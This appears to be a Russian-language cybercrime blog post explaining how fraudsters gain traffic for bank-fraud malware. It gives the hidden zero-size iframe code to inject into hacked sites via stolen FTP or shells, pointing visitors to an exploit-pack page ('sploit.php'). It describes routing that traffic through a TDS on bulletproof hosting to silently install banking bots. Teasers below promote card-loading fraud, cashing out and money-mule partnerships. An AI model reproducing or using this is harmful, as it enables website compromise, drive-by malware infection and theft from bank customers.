Skip to main content

Залив на карту или счёт и зачем нужен iFrame трафик


Трафик - на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф - это смешаный трафик нескольких стран стразу.

Для чего нужен трафик?
В своей основе iFrame трафик дроповоды и реальные заливщики денег на карты и счета используют для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок...

Чтобы иметь трафик дроповодам нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме - это самый надёжный вариант.

Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame - это код HTML внутри страницы. С помощью iFrame дроповод может вставлять один HTML документ в другой! Проще говоря, iFrame - это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:
<iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"></iframe>
где:
http://site.ru/sploit.php- это сайт на который пользователи site.ru будут заходить одновременно
width="0" длина равна 0
height="0" высота равна 0
frameborder="0" граница фрейма равна 0

Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

Что нужно для продажи трафика?
Есть такая штука, как TDS - Traffic Direct System, - это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.

Что же такое эти загрузки?
Загрузки - это загрузка и запуск файла на компьютере клиента банка или простого лоха, - один из самых распространённых методов распространения банковских ботов в Интернет.



Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов...

Загрузки - это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

Теперь про связку сплоитов
Exploit - это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

Что же такое пробив связки?
Пробив - это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился - тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site/svjzka.php - значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

Comments

Popular posts from this blog

PCI Compiance and ATM security

Researchers at Russian security firm Group-IB say that customers from some of the largest US banks have been affected by malware that steals credit card data directly from ATMs as well as point-of-sale (POS) terminals found at regular retailers. Cyber-crooks are infecting the Operating System that powers ATMs and point-of-sale terminals with malware capable of stealing financial data.
The business model behind going directly to the source is efficient because criminals only need to compromise a few ATMs to collect hundreds, if not thousands, of credit card numbers which can immediately be sold on the black market.

Historically, the bad guys have used many methods to carry out credit card or online banking fraud. Let’s review a few:

Phishing Sites
Phishing is the act of requesting personal information from the user under false pretenses. Phishing and spam often go hand in hand as victims tend to be lured via emails asking them to update their banking details or review recent transactio…

Заработок в онлайн играх с выводом денег

Одним из видов получения стабильного сетевого дохода является заработок в он-лайн играх, с выводом денег через электронные платежные системы, такие как Яндекс.Деньги или Webmoney или через любые другие электронные платёжные системы. Причем, способов заработать на играх в интернете существует несколько, и зарабатывать таким образом можно довольно внушительные суммы.




Как правильно играть на деньги в онлайн играх
1. Играть самому, без каких-либо денежных вложений в игру. Такой способ заработка занимает довольно много времени, а доход приносит весьма скромный. К тому же, в некоторых онлайн играх с выводом средств зарабатывать подобным способом просто невозможно, так как игры с возможностью заработать могут являться инвестиционными проектами (финансовыми онлайн играми), которые требуют обязательных минимальных вложений.


2. Играть самому, вкладывая деньги с банковской карты. Наверное, это самый оптимальный способ заработка реальных денег в онлайн играх. Сумма дохода здесь зависит от того, ско…

Залив на карту без предоплаты по SWIFT или SEPA

В последнее время наблюдается такая ситуация, что нальщиков и дропов на рынке много, а адекватных заливщиков, можно сказать, совсем нет.


Например, один мой хороший знакомый, имеющий свой собственный офшор, работает с заливщиками на условиях партнерства, предоставляя им трафик и взамен получая 20% от поведенных транзакций на свой счет в офшорном банке. Мне он рассказал по большому секрету, как такое ему удается, а начинал он как и все с малого - продажи дебетовых карт и игре на рынке FOREX.

Просто так искать Заливщиков на различных форумах, посвящённых обналу и отмыванию денег - достаточно муторное и нудное занятие, потому как после общения с десятым по счету заливщиком, начинаешь понимать, что просто так на карты и счета никто лить не будет.

Однако моему другу попался один довольно интересный вариант - Заливщик предложил сделать перевод в размере 375 000 EUR по SEPA в день предоставления готового к работе счета и активной системы Multihomed AS.



Остальные предложения были более мутные …

Как делают заливы на карты и банковские счета

Примерно 1,1 млн человек пришлось поделиться с нальщиками из Новосибирска не только своим транзакционными данными, но и сведениями о номерах социального страхования, которые находились в распоряжении электронной платежной системы финансового провайдера RBS WorldPay, принадлежащей банку Royal Bank of Scotland.

Персональные данные почти 1,5 млн человек оказались оказались в распоряжении грамотного заливщика, который получил доступ к базе данных банковской системы, успешно проэксплуатировав SQL инъекцию клиентского Web портала Royal Bank of Scotland.

Однако в финале купленные на обналиченные деньги дорогие иномарки и недвижимость пришлось переоформить на незнакомых заливщику лиц, которые и помогли ему остаться на свободе.

В 2008 году жителю Новосибирска Алексею Аникину удалось получить доступ к базе данных RBS WorldPay. На основе полученных данных о TRACK2 и пин-кодов реальных банковских карт были изготовлены поддельные банковские карты, по которым в течение 12 часов в банкоматах по все…

Как найти заливщика на карту

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево, но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли?

Ко мне начал обращаться народ обращается разных категорий

1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса 
2. Реальные мэны, которые льют сразу большую сумму по SWIFT без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личности, берущие реквизиты …